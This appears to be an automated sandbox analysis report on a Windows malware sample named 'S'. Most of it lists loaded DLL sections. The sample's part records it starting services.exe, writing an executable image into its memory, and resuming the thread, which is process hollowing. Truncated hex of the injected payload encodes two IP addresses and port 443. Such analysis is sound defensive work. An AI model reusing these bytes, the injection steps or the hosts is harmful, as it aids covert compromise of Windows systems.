    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
    C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
    C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit 630000 618496 own pid readonly success or wait 1
    C:\WINDOWS\system32\wiaservc.dll write and read and execute commit 670000 335872 own pid execute success or wait 1
    C:\WINDOWS\system32\wiaservc.dll query and write and read and execute image 75AA0000 348160 own pid read write success or wait 1
    \KnownDlls\CFGMGR32.dll write and read and execute unknown 75AA0000 348160 own pid read write object name not found 1
    C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
    \KnownDlls\setupapi.DLL write and read and execute unknown 74AE0000 28672 own pid read write object name not found 1
    C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
    \KnownDlls\mscms.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1
    C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
    \KnownDlls\WINSPOOL.DRV write and read and execute unknown 73B30000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
    \KnownDlls\WINSTA.dll write and read and execute unknown 73000000 155648 own pid read write object name not found 1
    C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76360000 65536 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\rpcss.dll write and read and execute commit 680000 401408 own pid execute success or wait 1
    C:\WINDOWS\system32\winlogon.exe write and read and execute commit 680000 507904 own pid execute success or wait 1
    \KnownDlls\xpsp2res.dll write and read and execute unknown 680000 507904 own pid execute object name not found 1
    C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 680000 2904064 own pid read write conflicting addresses 1
    \KnownDlls\CLBCATQ.DLL write and read and execute unknown 680000 2904064 own pid read write object name not found 1
    C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
    \KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
    C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
    \KnownDlls\WINTRUST.dll write and read and execute unknown 77050000 806912 own pid read write object name not found 1
    C:\WINDOWS\system32\wintrust.dll query and write and read and execute image 76C30000 188416 own pid read write success or wait 1
    \KnownDlls\CRYPT32.dll write and read and execute unknown 76C30000 188416 own pid read write object name not found 1
    C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
    \KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
    C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
    \KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
    C:\WINDOWS\system32\actxprxy.dll write and read and execute commit B20000 98304 own pid execute success or wait 1
    C:\WINDOWS\system32\actxprxy.dll query and write and read and execute image 71D40000 110592 own pid read write success or wait 1
    C:\WINDOWS\system32\sti.dll write and read and execute commit B60000 69632 own pid execute success or wait 1
    C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 431627791
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 431629165
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 431630406
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 431630898
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 431631303
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 431631570
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 431632096
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 431632226
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 431632711
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 431633869
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 431635264
    Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 431638932
    Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 431639572
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 431644909
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 431649453
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 431651041
    Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 431651788
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 431654538
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 431655033
    Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 431658057
    Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 431658581
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 431661236
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 431662674
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 431665305
    Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 431667480
    Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 431667997
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 431671279
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 431672366
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 431674632
    Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 431677941
    Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 431681332
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 431681847
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 431686241
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 431695824
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 431696740
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 431697489
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 630000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 431744712
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 630000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 431759577
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 431760517
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 431763970
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 431765018
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 431765831
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 431778782
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 630000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 431782405
    Section loaded Path: C:\WINDOWS\system32\wiaservc.dll Access: write and read and execute Type: commit Baseaddress: 670000 Size: 335872 Protection: execute Mapped to pid: own pid success or wait 431821262
    Section loaded Path: C:\WINDOWS\system32\wiaservc.dll Access: query and write and read and execute Type: image Baseaddress: 75AA0000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 431823515
    Section loaded Path: \KnownDlls\CFGMGR32.dll Access: write and read and execute Type: unknown Baseaddress: 75AA0000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 431827577
    Section loaded Path: C:\WINDOWS\system32\cfgmgr32.dll Access: query and write and read and execute Type: image Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 431828207
    Section loaded Path: \KnownDlls\setupapi.DLL Access: write and read and execute Type: unknown Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 431830173
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 431830690
    Section loaded Path: \KnownDlls\mscms.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 431833650
    Section loaded Path: C:\WINDOWS\system32\mscms.dll Access: query and write and read and execute Type: image Baseaddress: 73B30000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 431834956
    Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 73B30000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 431839469
    Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 431840020
    Section loaded Path: \KnownDlls\WINSTA.dll Access: write and read and execute Type: unknown Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid object name not found 431844296
    Section loaded Path: C:\WINDOWS\system32\winsta.dll Access: query and write and read and execute Type: image Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 431844823
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76360000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 431847425
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 431847967
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 680000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 431870787
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 431876974
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 680000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 431878913
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 431879428
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 680000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 431886024
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 431886574
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 431887565
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 431888142
    Section loaded Path: \KnownDlls\WINTRUST.dll Access: write and read and execute Type: unknown Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid object name not found 432193949
    Section loaded Path: C:\WINDOWS\system32\wintrust.dll Access: query and write and read and execute Type: image Baseaddress: 76C30000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 432194516
    Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 76C30000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 432196906
    Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 432197473
    Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 432200348
    Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 432200982
    Section loaded Path: \KnownDlls\IMAGEHLP.dll Access: write and read and execute Type: unknown Baseaddress: 76C90000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 432206108
    Section loaded Path: C:\WINDOWS\system32\actxprxy.dll Access: write and read and execute Type: commit Baseaddress: B20000 Size: 98304 Protection: execute Mapped to pid: own pid success or wait 432447279
    Section loaded Path: C:\WINDOWS\system32\actxprxy.dll Access: query and write and read and execute Type: image Baseaddress: 71D40000 Size: 110592 Protection: read write Mapped to pid: own pid success or wait 432448376
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: write and read and execute Type: commit Baseaddress: B60000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 432482927
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: query and write and read and execute Type: image Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 432486174
    Analysis File: S PID: 1568 Parent PID: 1888
    + Sections
    + General
    Start time: 04:13:06
    Start date: 13/12/2011
    Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S
    Commandline: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S
    Imagebase: 0x400000
    File size: 17925 bytes
    MD5 hash: 5EA58C5F12405A4E959234134123380D
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\MSVCRT.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe query and write and read and execute and extend size image 850000 12288 own pid readonly success or wait 1
    \BaseNamedObjects\ShimSharedMemory write unknown 860000 57344 own pid read write success or wait 1
    C:\WINDOWS\system32\apphelp.dll write and read and execute commit 870000 126976 own pid execute success or wait 1
    C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 870000 1208320 own pid readonly success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    C:\WINDOWS\system32\services.exe write and read and execute commit 9A0000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 9A0000 110592 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe write and read and execute commit 9A0000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 9A0000 110592 own pid readonly success or wait 1
    C:\WINDOWS\system32\services.exe query and read commit 870000 110592 own pid readonly success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    Process Activities:
    + Process started
    PID Filepath Cmdline Flags Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 0 success or wait 1 401376
    + Process terminated
    PID Filepath Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 1 401639
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 0 401639
    Thread Activities:
    + Thread context set
    TID PID DR0 DR1 DR2 DR3 DR7 EFLAGS EIP Completion Count Source Address
    584 388 0 0 0 0 0 200 7C810705 success or wait 1 4012E0
    + Thread resumed
    TID PID Completion Count Source Address
    584 388 success or wait 1 4012EB
    Memory Activities:
    + Memory read
    PID Filepath Base Length Value Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe 7FFDD008 4 00 00 00 01 success or wait 1 4011F0
    + Memory written
    PID Filepath Base Length Value Completion Count Source Address
    388 C:\WINDOWS\system32\services.exe 400000 1024 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 38 A7 1C 4C 7C C6 72 1F 7C C6 72 1F 7C C6 72 1F FF CE 2F 1F 72 C6 72 1F FF DA 7C 1F 7F C6 72 1F 13 D9 78 1F 77 C6 72 1F 13 D9 76 1F 7E C6 72 1F 7C C6 73 1F 15 C6 72 1F 4A E0 76 1F 7F C6 72 1F 4A E0 79 1F 79 C6 72 1F 52 69 63 68 7C C6 72 1F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 E2 62 DC 4D 00 00 00 00 00 00 00 00 E0 00 0F success or wait 1 401255
    388 C:\WINDOWS\system32\services.exe 401000 7168 E8 05 00 00 00 E9 0A 00 00 00 B9 A0 43 40 00 E9 AA 16 00 00 68 20 10 40 00 E8 3E 17 00 00 59 C3 B9 A0 43 40 00 E9 9A 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 98 43 40 00 E9 80 16 00 00 68 4A 10 40 00 E8 14 17 00 00 59 C3 B9 98 43 40 00 E9 70 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 94 43 40 00 E9 56 16 00 00 68 74 10 40 00 E8 EA 16 00 00 59 C3 B9 94 43 40 00 E9 46 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 90 43 40 00 E9 2C 16 00 00 68 9E 10 40 00 E8 C0 16 00 00 59 C3 B9 90 43 40 00 E9 1C 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 88 43 40 00 E9 02 16 00 00 68 C8 10 40 00 E8 96 16 00 00 59 C3 B9 88 43 40 00 E9 F2 15 00 00 55 8B EC B8 14 13 00 00 E8 91 16 00 00 53 56 57 33 DB B9 FF 03 00 00 33 C0 8D BD ED EC FF FF 88 9D EC EC FF FF F3 AB 66 AB AA 6A 40 33 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 403000 2560 32 38 00 00 48 38 00 00 1C 38 00 00 00 00 00 00 B8 36 00 00 CE 36 00 00 D8 36 00 00 E4 36 00 00 F2 36 00 00 FE 36 00 00 0C 37 00 00 18 37 00 00 34 37 00 00 40 37 00 00 4C 37 00 00 58 37 00 00 6C 37 00 00 7C 37 00 00 88 37 00 00 9A 37 00 00 A8 37 00 00 BE 37 00 00 D0 37 00 00 E4 37 00 00 C6 36 00 00 00 00 00 00 F1 18 00 80 99 02 00 80 6C 10 00 80 DA 1A 00 80 AC 03 00 80 19 02 00 80 5A 03 00 80 17 02 00 80 02 0B 00 80 5C 03 00 80 62 01 00 80 1C 02 00 80 42 14 00 80 F6 0C 00 80 BB 07 00 80 37 03 00 80 42 15 00 80 20 03 00 80 39 03 00 80 00 00 00 00 36 36 00 00 42 36 00 00 56 36 00 00 66 36 00 00 76 36 00 00 84 36 00 00 96 36 00 00 AA 36 00 00 26 36 00 00 1C 36 00 00 14 36 00 00 06 36 00 00 FE 35 00 00 E8 35 00 00 DA 35 00 00 D2 35 00 00 C8 35 00 00 BE 35 00 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 404000 1024 00 00 00 00 00 10 40 00 2A 10 40 00 54 10 40 00 7E 10 40 00 A8 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 39 2E 31 2E 32 33 2E 37 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB 01 00 00 00 00 00 00 00 00 00 00 36 35 2E 38 37 2E 31 39 39 2E 31 30 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 401292
    388 C:\WINDOWS\system32\services.exe 7FFDD008 4 00 00 40 00 success or wait 1 4012C9
    + Memory allocated
    PID Filepath Base Length Protection Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S 880000 12FAA0 page read and write success or wait 1 4011B2
    388 C:\WINDOWS\system32\services.exe 400000 12FAB8 page execute and read and write success or wait 1 401238
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 436014252
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 436035657
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 436055366
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 436057329
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 436061142
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 436062291
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 436063779
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 436081143
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 436085162
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 436086404
    Section loaded Path: \KnownDlls\MSVCRT.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 436093569
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 436102600
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 436105165
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 436107285
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 436109174
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 436112614
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 436117408
